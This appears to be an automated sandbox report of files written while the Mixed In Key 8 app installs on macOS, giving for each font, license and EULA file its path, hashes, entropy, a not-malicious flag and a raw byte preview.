                                                                                                    Preview: MM.*.....? @.$....BaP.d6...DbQ8.V-..FcQ..v=..HdR9$.M'.JeR.d.]/.LfS9..m7.NgS.......hT:%..G.RiT.e6.O.TjU:.V.W......v._.XlV;%..g.ZmV.`..m.\nW;...w.^oW....o.`pX<&....bqX.f6)..drY<.W-..fsY..C9..htZ=&.M.._...f.]..lv[=..W..nw[...}..O6..'....ry\......tz]>.W.....]..w...s...'....z}W.....{...G....y..0V3q...@(...H .q....v.........y.......h....@:.........B.. x...p......e...lh........p.j............d..........:.....&.....J....B.|.. ....B...|.H(.}.p................X....9..A0%..4DoE..m....z....a.k...*........8...........-..t.-..L.Y.....L.=Q+..D.X.3={&..mP..G..{.P..f.'..{Op.0..!0#...($.Et..q..+uH....t..1.}..!.N.......}[Z...eVJ.4.X.X..T....'_..._....].H&(.X6%..X.Y...8...c.....A8$....R..WNe.....tf...x.g..d.g.nn.g..5`...YK. .1U....J...Y...[....y+k..+.....].x.7.l...b...+8..gs...~......V.....2@.-...#...n9..G.....I%.I...T.Y-.K.....i5.M.....y=.O......E.Q...U".M.S..g..p.z.[o.......@.....a.W....~.k....[...a.Z...5..n...wX..3l.\.....7....8.V#%v..@.<.33a~../.....z:..h3.....I#...`.$.C....y..o........q...W..K.s....e
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/eula/.BC.T_qvCNgi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:HTML document text
                                                                                                    Size (bytes):2594
                                                                                                    Entropy (8bit):5.331406449432421
                                                                                                    Encrypted:false
                                                                                                    MD5:0CBCB2343FDE35949D10D0B44FF67889
                                                                                                    SHA1:CE4827F7203803DF1FFE03642511535B595E0060
                                                                                                    SHA-256:912CAFC539AE1AFA5B6BCB3D1C3A5991BB756CB9756F9C775739212BCFA5CBBA
                                                                                                    SHA-512:51EBBBDC025549D38F7FB69CF208B6FF027C4E01B6F2C0D7CFADB975680450A0CF8E10F88C0688A9A4DD26080250A9589C57C4C3C569C4C652B2FEE7AF1EDE25
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<meta http-equiv="Content-type" content="text/html; charset=utf-8">..<title>Platinum Notes End User Agreement</title>..<link rel="stylesheet" type="text/css" href="style.css" media="all">..<style type="text/css" media="print">...body { width:100%; min-width:0; padding:0; font:11pt Times, serif; }...a { color:inherit; text-decoration:inherit; }..</style>..<script type="text/javascript" charset="utf-8">...function setAllInfo() {....document.getElementById('year').innerHTML = new Date().getFullYear();...}..</script>.</head>.<body onload="setAllInfo();">..<div><img class="logo" src="./miklogo.tiff" alt="Mixed In Key logo"></div>..<h1>Mixed In Key</h1>..<h2>End User License Agreement - EULA</h2>..<p>These Terms and Conditions govern your use of MIXED IN KEY software and your relationship with Mixed In Key LLC. Please read them carefully as they affect your rights and liabilities under
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_0gaPmY
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):177552
                                                                                                    Entropy (8bit):6.469870038378307
                                                                                                    Encrypted:false
                                                                                                    MD5:50705C5ED1205B63EFDBFEE941A6B655
                                                                                                    SHA1:6C8ACC36BBDF17BCD6A33756AA42E2557BB3F805
                                                                                                    SHA-256:013D22A4FB2638ADBA28555EE19366F4585F6DC533B7C332F4931A231497CB22
                                                                                                    SHA-512:5BC34823C8FAC9AB2830B629EB60449DABB9AE8E64E84F898CEAC00CF53C5A10E13875EF5B15C7067B96B9BADC9EED18867E0FF30D0C3F2D3F4961BFDC2D8737
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B....8l...bGPOS.nK...:...e.GSUB...Y........OS/2.v.........`cmap.wX....X...Fcvt ...=..0....Zfpgm..#...-.....gasp......8`....glyf......;....xhdmxy......@....head.G.W...,...6hhea.H.....d...$hmtx..#........8loca..A...0.....maxp.>......... name.;....3.....post.a.d..8@... prep...C../\...8......#....=_.<...................R..Y.....s.................l.....u.Y.H...............................T.................................3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d.......................Q.......4.....E...=.a...^.......c./. .!.......b.$...`...K...................+...A...^...(...{._.%.F.........D.......t.....S.......".H.....b...H...T.O.~...a...f.......?.......}...f.J.....f.M.............2.J.*...................:...Y...:.x...1.w.l.....(...h.......g. .D.%...6.....k...,..."...H...,.......j...f...h...f.!...........6.j.,...R...l...........................E._.....J.....U...=...............".\.w...../.L.~.".\.........7.....M...Z............
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_1AZHwU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):176864
                                                                                                    Entropy (8bit):6.479365592674514
                                                                                                    Encrypted:false
                                                                                                    MD5:BD19AD60600A1537C00D3B4923A5E5DE
                                                                                                    SHA1:CAB617ECCF6DB0396675EC9C42E747A4738F059F
                                                                                                    SHA-256:F177EED10D2470D13EC68D04907A582829D0EE8281F8A02A906F6954C7816E58
                                                                                                    SHA-512:6CC380C4D736F974009F8F05D25E9813A89F296D32B9BC74F7109336B7C81E76216C34178D41F9AF2C9D845843D91AD749CF33F40DFB6ED70AFE4601F411CEE1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B....5....bGPOS.nK...8 ..e.GSUB...Y...P....OS/2...d.......`cmap.wX....X...Fcvt 1..M..0....\fpgm..$...-.....gasp......5.....glyfc.<G..;0....hdmxOshu...@....head...v...,...6hhea.......d...$hmtxu..........8loca..+...1.....maxp.>......... name.1|7..0.....post.a.d..5.... prep9...../\...X......#.d.9L_.<...................R..A...x.s.................l.....7.A.b.x.............................V...............8.................3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d...................7.......;.s.B.......-.Z.....h.....x.g.].=.......6.5.0.....s.`.s...s...s.&.s...s.Z.s.c.s...s.;.s.....+.......2.b.b.../.......2.4.....'...e...'.m.'.M.'.R.k...'.;.5.Y.....'.=.'...'...'.f.k...'.f.d...'...$.......[.....................*...H...*.z.[.D...y.....=.".h.....8.k.;.4.;..._.p...Y.......................[...u.9.h...r.;...........;.Z.J...d...w...............0... .....2.[.....e.L.....|...).2.........t.....^.......I.U.....^.........3.....V...g...........}
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_6q2u9T
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text, with CRLF line terminators
                                                                                                    Size (bytes):11560
                                                                                                    Entropy (8bit):4.476377058372447
                                                                                                    Encrypted:false
                                                                                                    MD5:D273D63619C9AEAF15CDAF76422C4F87
                                                                                                    SHA1:47B573E3824CD5E02A1A3AE99E2735B49E0256E4
                                                                                                    SHA-256:3DDF9BE5C28FE27DAD143A5DC76EEA25222AD1DD68934A047064E56ED2FA40C5
                                                                                                    SHA-512:4CC5A12BFE984C0A50BF7943E2D70A948D520EF423677C77629707AACE3A95AA378D205DE929105D644680679E70EF2449479B360AD44896B75BAFED66613272
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .. Apache License.. Version 2.0, January 2004.. http://www.apache.org/licenses/.... TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.... 1. Definitions..... "License" shall mean the terms and conditions for use, reproduction,.. and distribution as defined by Sections 1 through 9 of this document..... "Licensor" shall mean the copyright owner or entity authorized by.. the copyright owner that is granting the License..... "Legal Entity" shall mean the union of the acting entity and all.. other entities that control, are controlled by, or are under common.. control with that entity. For the purposes of this definition,.. "control" means (i) the power, direct or indirect, to cause the.. direction or management of such entity, whether by contract or.. otherwise, or (ii) ownership of fifty percent (50%) or more of the.. outstanding shares, or
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_8YnpXO
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):171480
                                                                                                    Entropy (8bit):6.455991502607069
                                                                                                    Encrypted:false
                                                                                                    MD5:EC4C9962BA54EB91787AA93D361C10A8
                                                                                                    SHA1:C572416B9587C40D49EA60C7128F7F17B9317AD8
                                                                                                    SHA-256:3872E9B39760A1B59AC1E192633DBB3B58E595B4D423930AC7DED525E9AE25E0
                                                                                                    SHA-512:D55B1623E9F1A1222CC9D80F70F69287D3F94720566588788189D335FBDBCE8EDAF73513FBCA636E74E3EF4C61DA9EA12046AB6EC518B126BAB623B44F199E1D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B.... ....bGPOS.nK...#...e.GSUB...Y...H....OS/2.v.........`cmap.wX....X...Fcvt ...=..0....Zfpgm..#...-.....gasp...... .....glyfV.....;.....hdmx.......@....head...R...,...6hhea.].....d...$hmtx^..........8loca.nA...0.....maxp.>......... nameNQG....(...`post.m.d.. .... prep...C../\...8......#.Rg3i_.<...................R..<.....s.................l.......<.)...............................O.................................3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d.................5.g...........S...Z.d.8.<.+...x...(.....F.-.(.+.....k.u.......U.......;.../...;...P...S...4...T...O.g.v.N.D...........o.....*.;.s...).n.@.E.,.n.z.n.`.n.t.R...n.j.....$...n.V.n...n...n...E.5.n...H.8.n...@...$.Q.i.I.................>.A.l.i...A.....$.......6.?.-...a.(.4...4.[.=.......7...W.3.\.)...`.a.3.p...a...X.~.4...a...4...a...#.......Y."...........%.....B...(.......)...^.g.{...b...g.u.E.T.....w...^..._.H.U.......A.d.}.H.U.)...-.}.N.T...3...)...Z.!.....R
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_9zFo9q
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):128180
                                                                                                    Entropy (8bit):5.923497321976906
                                                                                                    Encrypted:false
                                                                                                    MD5:A37B0C01C0BAF1888CA812CC0508F6E2
                                                                                                    SHA1:FC05DE31234E0090F7DDC28CE1B23AF4026CB1DA
                                                                                                    SHA-256:B7F4A3AB562048F28DD1FA691601BC43363A61D0F876D16D8316C52E4F32D696
                                                                                                    SHA-512:CD8784A162ED428CA5A76E5E877349D50620773E3A3D202D5199FEFB5D69A9B87B92C5DE9455DC3C373FEFB065F06A18F17199A5601887FC1F880D14BD223769
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...........pGDEF...S.......$GPOS.......,...6GSUB...Q...d..iPOS/2.s"c...x...`cmap..1....x....cvt ...D...|....gasp............glyfD}........rHhead...f.......6hhea.......4...$hmtxj.iF........loca;)..........maxp.'.....X... name..5....d...zpost...2....... ........O."._.<......................................................................................................@.................L.f...G.L.f...........................................0........................... .+.......................................................................................+.+...@.+.@.@.U.@.U.5.+.@.@.U.k.k.@.+.+.+.+...+...+.+...+.+.+.+.@.+...@.@.U.U.....+...+.+.+.@.+.k...@.@.+.@."...U.U.U.U.U.U.....+.+.+.U.....+.+.....,.@.+.........+.@...+.@...U.w.@.k.U.+.@.+.+.@.U.+.+.k.@.@.+.k.+.+.+.3.@.+.......[...k...k.+.+.....@.U.+.>.....+.....@.U.k.@.+.+.@...+.k.+.+.@.@.+.@.k.U.=.@.+.+.+.!.k.+.+.@...@.@.@.+.@.k.+.+.@.@.+...+.+.+.+.+.+.+.+...........k.@.U.@.........+.U...............@.+...+.+.@...k.....U...+.+.3.+....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_J8xzJR
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):176300
                                                                                                    Entropy (8bit):6.492925082087355
                                                                                                    Encrypted:false
                                                                                                    MD5:0FC25386220A58203994CE45FB4AE570
                                                                                                    SHA1:C9297D2166618DA2B66A06BACFCBD50B68581E6F
                                                                                                    SHA-256:F5E89A344894A60F0F98F1C0182BA51F5046E29DDE3118820D39025445AEAAE8
                                                                                                    SHA-512:50D910E4FA2855EB58C02F4EC3D9A381903509C26240C01A0E9B29CB31FA78BEBC01DAF0A978D78362FA2DDB93B982BFA2F5439C6A1ACF2A32337623BE78AA03
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.L....:....bGPOS......=H..].GSUB............OS/2...'.......`cmap.wX....X...Fcvt .2....0@...Hfpgm_.....-.....gasp......:.....glyfU.'...:....dhdmx.)%/...@....head.|.....,...6hhea.}.e...d...$hmtx..&Q.......8locai.....0.....maxp.>......... name......6.....post.a.d..:.... prep+6..../\..........#..qsA_.<...................R..>.....s.................l.......>.W...............................W.......................D.........3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d...................+.....I...I.K.......;.T...W.p.f.{.H.z.f.P.~...W.B...+.....I.g.I.$.I.8.I.9.I.-.I...I.].I...I.*.I...k...k.....W.^.s...6.l...?.J.......Y.......Y.u.Y.{.Z.^...}.Z.....M.&...Z...Y...Z...Z.5.w...Z.5.w...V...,.....6......................... .......j.B.n.>.....!.#...I.=...C.I.]...9.|...K.!.I.?...L.......?...L...5.I.?.O.A.I...I.]...?...-...o.I.r...t...................>...(...d.d.......?.i.f.........1.........y.%.Z.}.q...x.~.6...b.u...............t...x.....I......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_KT1dH7
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):170420
                                                                                                    Entropy (8bit):6.484124799440601
                                                                                                    Encrypted:false
                                                                                                    MD5:FC84E998BC29B297EA20321E4C90B6ED
                                                                                                    SHA1:73A2BB2D6E591A90FFB4ED118A3989FB17B54C7B
                                                                                                    SHA-256:A6D343D425BC38DB90152FA06058B1C7391ECA9264F334EF65C1CE175085C6F6
                                                                                                    SHA-512:B4CA0BD4D54CE7C896F7BBE931B45347CA7BF6DA10EC1A4DAC9479E5A98573DB531FE96CEDC7A4B67371CC600A587FD508FA4ACDB08233AEBEA89D8EF7AE9769
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B....#....bGPOS......&X..].GSUB...Y...$....OS/2...........`cmap.wX....X...Fcvt /.....0....Xfpgm.."...-.....gasp......#.....glyf......;....VhdmxG`Rp...@....head.Y.i...,...6hhea.......d...$hmtxU..?.......8loca...t..0.....maxp.>.\....... namegYaG...h...`post.m.d..#.... prepz/.W../\...:......#.8R.o_.<...................R.. .....s.................l.....7. .E...............................Y...............r.......o.,.......3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d.....................L.....U.o.s...m...l.\.w.......!.e.....K...<.J.1.....-...o.x.o...o.i.o.b.o.C.o...o...o.M.o.j.o.e.......<...M.m...%.|...T.N.q.........2...=...........x.......!...g.G.....7...........j.}.....j.y.......X...4.B.......,.=...7.......Z.....'.0.....T.M.t...I.g.I.d.o.....^.r.l.".Z...?.p.l.d.......................e...{.Z.o...v.l.......e.....e.....&...?...0... ...W...D.........z.......[.w...]...m. .........f.q...e.k.......{.].|.j.f.j.......=.T...L...G.@.|.t.....S
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_PK8BZF
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):174952
                                                                                                    Entropy (8bit):6.4597396022196705
                                                                                                    Encrypted:false
                                                                                                    MD5:1EB7A893589DDCE89D81CDB22A356660
                                                                                                    SHA1:8CD79E47ED8A9F9EA79FFA186852AD7CBAD5687F
                                                                                                    SHA-256:A4BCAC14F419A97DE0917198A4BC51C3ED4FC4A3DB9F68A5102F23664EE01354
                                                                                                    SHA-512:F43EBBF375623DFBE10AFAC3C19E432BBA2B669BF9390F1E4D167F9147CD027A2D434A42EA3E4B7DB108F84E3FBB9FE5AB619DA609AFFC1B425623789A2F7918
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B.....D...bGPOS.nK...0...e.GSUB...Y........OS/2...........`cmap.wX....X...Fcvt ..,o..0....Jfpgmc.....-.....gasp.......8....glyf.*.F..:.....hdmx_zn....@....head...`...,...6hhea.......d...$hmtx.[_........8loca3.....0.....maxp.>......... name.+M...)....qpost.a.d....... prep9..B../\..........#..).._.<...................R..M.....s.................l.....U.M.U...............................T.................................3.......3.....f..................P. [... ....GOOG.!.........f.... ........:... . .....d.................&.'...y.....~.;....."...K.x...c.......d.F.........Z.K.*...o.~.V.~...~...~...~...~.C.~.Q.~.q.~.3.~...;.).......$.{.Q...!.........C.........W.....g...J...S.`.....M.(.`.......>...........f.Z.....f.Y.......".....&.T.....................2...P...2.y.n.9...q.....3...h.....+.i...<.0...J.x...b.........../...........c...m.,.h...l.............8.b.;...\...s...............'...........P.;.....K.....i...3............... .].|.....<.Q... .].........5.....Q...`............
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_RpObUJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):171676
                                                                                                    Entropy (8bit):6.461076726743102
                                                                                                    Encrypted:false
                                                                                                    MD5:3E1AF3EF546B9E6ECEF9F3BA197BF7D2
                                                                                                    SHA1:DD1B1DB13FF1F72138C134C62F38FEF83749F36A
                                                                                                    SHA-256:79E851404657DAC2106B3D22AD256D47824A9A5765458EDB72C9102A45816D95
                                                                                                    SHA-512:81A9260AA3597C02C40AB4642C565D7584D99DDCB8A59ADDC92C15BA93F96F05F2C94DC77C2D5C11C1805F593D84E5E9C62373ECC6CA43A76D15C05C1B1D116E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B....(....bGPOS......+@..].GSUB...Y........OS/2...........`cmap.wX....X...Fcvt +.....0....Tfpgmw.`...-.....gasp......(.....glyf&.....;....lhdmxUz`z...@....head.j.z...,...6hhea.......d...$hmtx.r.........8loca.w....0.....maxp.>......... name......$....&post.m.d..(.... prep.f..../\...I......#...pH_.<...................R......0.s.................l.....I...J.0.............................T...............$.................3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d...........................w.~.n...i...e.e.g.......&.r.....N.....5.%.....L...~.s.~...~.].~.^.~.5.~...~...~.M.~.p.~.d.......)...H.d.........K./.j.8.......5.w.?.......l...s.z.....-...j.5.....N.............v.......m.......P...1.0.........=...9.......V.....H.(.....X.@.....y.9.Z.m.}...0.\..._.=.]...<.}.`.h.......................j.....[.}....._..... ._.....i.....!...+...).......X...@.........q.......`.i...[...i.3.........Z.X.e.I.[.......f.n...J.Z.........F.a...B...>...{.......C
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_YBJd0d
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):171904
                                                                                                    Entropy (8bit):6.4481811458342895
                                                                                                    Encrypted:false
                                                                                                    MD5:89E2666C24D37055BCB60E9D2D9F7E35
                                                                                                    SHA1:9514AD7AEE341594F43A33893F0B3D8A6D81F32E
                                                                                                    SHA-256:3D91F7AA69CB7F7064035895C566AC5CB9B2084582D351AF7267BB4E0FBA60F5
                                                                                                    SHA-512:B4738B9DED4B7813F4E85983628128682F44BF7262F0CF1BAED6EB58F0DAD79CC63FA3BC79816213362CFF0EE4DE286E90367ED7AD3C461BA9647C93BAE06EBB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.L....)....bGPOS......,...].GSUB............OS/2...{.......`cmap.wX....X...Fcvt .2....0@...Hfpgm_.....-.....gasp......).....glyf."....:.....hdmx)E5O...@....head.G.....,...6hhea.......d...$hmtx...........8loca..m...0.....maxp.>......... nameO.....%4...Xpost.m.d..).... prep+6..../\..........#.l..8_.<...................R..$.....s.................l.....&.$.@...............................V.......................Y.........3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d.........................a.3.a.y...r...s.T..._...o...X.....I...\._.=.......*.a.}.a...a.u.a.g.a.R.a...a...a.M.a.d.a.g.l.x.l.Q...R.v.....r.}.].n.x...!...../...<...........~...........e.Z.....!...........T.......T...<.....`...7.U.....#.?.=...6...!...^.......9.....Q.[.M.......9.\.a.....a.a.z...W...B.c.y.a.........q.........,...a...g.Z.a...a.z.......l...&.a.....+...S...7...+...W...I.................V...~._...r...!.......s.......{.........M.z...s.+.......5.H...V...P...~.a.....c
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_ZL97YN
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):172064
                                                                                                    Entropy (8bit):6.474449197018235
                                                                                                    Encrypted:false
                                                                                                    MD5:D08840599E05DB7345652D3D417574A9
                                                                                                    SHA1:5F16F4D6DBB4A4F12D8AE96488AC209BB49762A5
                                                                                                    SHA-256:F205CC511821EA56078A105557FCEA6253129404D411C997E1866FBD006ABB68
                                                                                                    SHA-512:1610097AC5709EDBE56A05E6B337769DCB338BB4417693717B5A5E157E824E25E0AF4EDA1C297F35553DF05754D9785136FA230AB1CAFABFC44DA63C7547715B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B...."....bGPOS.nK...%`..e.GSUB...Y........OS/2...........`cmap.wX....X...Fcvt 1..K..0....\fpgm..$...-.....gasp......".....glyf/.....;,...<hdmxd.t....@....head...r...,...6hhea.......d...$hmtx..M........8loca..n...1.....maxp.>......... name.-.....h...hpost.m.d..".... prep...)../\...S......#...$6_.<...................R..$...\.s.................l.....k.$.A.\.............................N...............0.................3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d.................%.....e...`...d...c...V.Z.R.......(.....u.D.......G.<...*.....i.......Q...O...4.......u...E...h...]...........?.z...*.....<.(.[.S.......9.f.:.......e...r.j.....B...q.-.....T.............f.......`.......J...-.7.}.-.....0...).......P.1...X...1...k.5.......1.T.Z...|.0.O...O.K.S...-...R.q.y...}.....-.}.......|.s.y...O...|...O...|.!.K.....r.w.......!...........R...8.........Q.u.....}.d...^...].@.........Z...].D.W.......W.m...D.W.........J._...<...7...p.......E
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_a5ogjE
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):176616
                                                                                                    Entropy (8bit):6.49166757683843
                                                                                                    Encrypted:false
                                                                                                    MD5:D1EFCD4D126837FE0DCF9B6CF3A00D64
                                                                                                    SHA1:037EF2BF307642203858DD252FC46EB400684F02
                                                                                                    SHA-256:364A23E13C64937C3FCEA3DB778628B89379C893849BBADE6E5BF83C5F605C6A
                                                                                                    SHA-512:ED6EFBAD5D0806AB08EEF4E87C64FE57E8885B84C56ADEB2A1F0A600F00AD90179A27A5331E4A86C0F011E34D06377712BD6B341D476CD84BD1235D8C49307DE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B....<(...bGPOS......>...].GSUB...Y...X....OS/2...<.......`cmap.wX....X...Fcvt /.....0....Xfpgm.."...-.....gasp......<.....glyfi|b5..;....0hdmx/KCZ...@....head...m...,...6hhea.......d...$hmtx.q.........8loca..r...0.....maxp.>......... name.B.U..7D....post.a.d..;.... prep.1 .../\...?......#.&.8._.<...................R..;...6.s.................l.......;.f.6.............................X.......................Y.,.......3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d...................6.D.....0.W.L.......=.\.....n.....U.r.k.L.....B.-.........W.j.W...W.&.W.9.W...W...W.j.W...W.9.W.............K.U.p...6..... .J.......I...|...I.t.I.g.I.X.....I...c.O.....I.!.I...I...I.J.x...I.J.t...F...-.....$.{...............................p.D.].c...A...2.%.W.-...G.Z.U...B...~.X...L.....;...........;...(.M...c.C.W...^.V...........W.M.i...q...................:...#...x.Z.v.....D.^.y.........8.........a...>.p.y.....j.E...C.k.Z.......&.....g...v.9...\......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_nGLkYt
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):170760
                                                                                                    Entropy (8bit):6.461560977756977
                                                                                                    Encrypted:false
                                                                                                    MD5:EE7B96FA85D8FDB8C126409326AC2D2B
                                                                                                    SHA1:0CE37CED9C5FCAC9BDC452A432C1258870BA4677
                                                                                                    SHA-256:7D0B991EE3E0BE7AF01AD7EA8CD2BEEA6C00A25E679A0226B6737F079AAFFF86
                                                                                                    SHA-512:63849D833A0D2F923066DA3CD83332C1C48E5D599730A96E6CB36738A0AC7A9E108236E74E3EDAC3A6D680A9A7C4776BEF801E492536AB2A1DB66588D1AD5A72
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B.........bGPOS.nK... H..e.GSUB...Y...x....OS/2...........`cmap.wX....X...Fcvt +~....0....Hfpgm_.....-.....gasp............glyf..H...:.....hdmx.......@....head...\...,...6hhea.&.....d...$hmtx'..].......8locaw..C..0.....maxp.>......... name.m.A.......5post.m.d....... prep*v60../\...)......#..Np._.<...................R..0.....s.................l.......0.5...............................N...............2.................3.......3.....f..................P. [... ....GOOG. .........f.... ........:... . .....d.................-.|...@...@...\..._.@.G.K.?...|...(.....^.9...#...n.S.~......._.......F...@...7...i...d...=..._...V.B.}...9...6.....".x...-.).K.b.......<.V.3.......b...s.^.....U...x.(.....U.............V.).....T.......E...(.D.t.;.....#...........I.9.x.`...9.....,.......4.J.D...o.,.B...B.S.H.......E.z.h...m.....F.o...~...o.{.i...B...o...B...o...8.....z.h...................J...0.......".0.j.B.....c...c...Q.J.........\...^.F.V.......M.i.~.F.V.......~.L.Y...7...0...e.......K
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_xQn70t
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TrueType font data
                                                                                                    Size (bytes):173932
                                                                                                    Entropy (8bit):6.472653515114601
                                                                                                    Encrypted:false
                                                                                                    MD5:42BBE4EEFCDE1297B11DC4B6491E9746
                                                                                                    SHA1:0213E38DFFDE2A0A5672D84FB62C6AA994E38C3B
                                                                                                    SHA-256:5FCE8B6F8BA9F4D19F0D535E241D56A2B8E72BB07E7DF711D968D092EF7F9FCA
